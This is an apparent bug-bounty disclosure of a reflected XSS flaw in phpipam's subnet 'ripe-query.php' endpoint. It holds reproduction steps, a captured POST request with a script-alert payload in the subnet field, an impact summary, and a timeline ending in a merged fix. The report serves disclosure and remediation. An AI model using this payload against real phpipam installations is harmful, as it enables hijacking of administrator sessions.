Cross-site Scripting (XSS) - Reflected in phpipam/phpipam

Valid

Reported on

Jan 28th 2022


Description

Reflected XSS attacks AKA non-persistent attacks when a malicious script is reflected off of a web application to the victim’s browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application’s functions and the activation of malicious scripts.

Proof of Concept

Steps to Reproduce:- 
Login in to webAPP using Admin Creds. 
Navigate to SubNET "http://localhost/phpipam/index.php?page=subnets&section=1" 
Choose any SubNet and Click on Edit 
Click on Get Information button of SubNet Input field ANd Capture The Request using proxy tool and Change SubNet IP to XSS PayLoad As you see in my below POST REQUEST

=======================================================================================

POST /phpipam/app/admin/subnets/ripe-query.php HTTP/1.1
Host: localhost
Content-Length: 47
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Cookie: phpipam=keqtftn3sihc7kbu6m79rdlis0;
Connection: close

subnet=<script>alert(document.domain);</script>

Impact

Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

We are processing your report and will contact the phpipam team within 24 hours. 4 months ago
We have contacted a member of the phpipam team and are waiting to hear back 4 months ago
We have sent a follow up to the phpipam team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the phpipam team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the phpipam team. This report is now considered stale. 3 months ago
phpipam/phpipam maintainer has acknowledged this report 2 months ago
garyallan modified the report
2 months ago
garyallan modified the report
2 months ago
garyallan validated this vulnerability 2 months ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
AggressiveUser
2 months ago

Researcher


@admin @maintainer can you assign CVE ID if it’s possible for this report

Jamie Slome
2 months ago

Admin


We sure can, we just need confirmation from the maintainer before we proceed with a CVE.

@maintainer - are you happy for us to assign and publish a CVE for this report?

garyallan confirmed that a fix has been merged on 47c104 2 months ago
garyallan has been awarded the fix bounty
to join this conversation